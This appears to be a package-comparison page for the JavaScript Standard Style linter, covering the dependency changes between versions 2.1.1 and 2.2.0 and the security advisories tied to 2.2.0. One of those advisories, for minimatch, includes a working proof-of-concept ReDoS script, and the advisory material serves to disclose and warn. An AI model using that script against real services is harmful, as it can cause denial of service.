Standard, the popular JavaScript Standard Style linter, saw a minor version bump from 2.1.1 to 2.2.0, released on January 30, 2015. Both versions maintain the core promise of providing a quick and easy way to enforce code style consistency across JavaScript projects and shares the same dependencies: glob, jscs, split, eslint, jshint, find-root and minimatch.
The most notable difference from a developer perspective is the addition of the minimist dependency in version 2.2.0, this likely introduces improved command-line argument parsing capabilities, potentially making the linter more configurable from the terminal. If you are using standard as a command-line tool, this might impact the arguments you need to pass to the tool. The package run-parallel was moved from devDependencies to dependencies, indicating that it became a necessary module for running the tool rather than a development dependency.
Both versions include familiar development dependencies like mkdirp, rimraf, extend.js and run-series, used for tasks like creating directories, removing files, extending objects, and running tasks in series, critical during development and testing.
Developers leveraging Standard can expect a consistent code style enforcement experience in both releases. However, those upgrading to 2.2.0 should be aware of the new minimist dependency's influence on command-line flag configurations and of run-parallel usage, ensuring a smooth transition. Standard simplifies development by automatically formatting code and is a tool that reduces style debates within development teams.
All the vulnerabilities related to the version 2.2.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.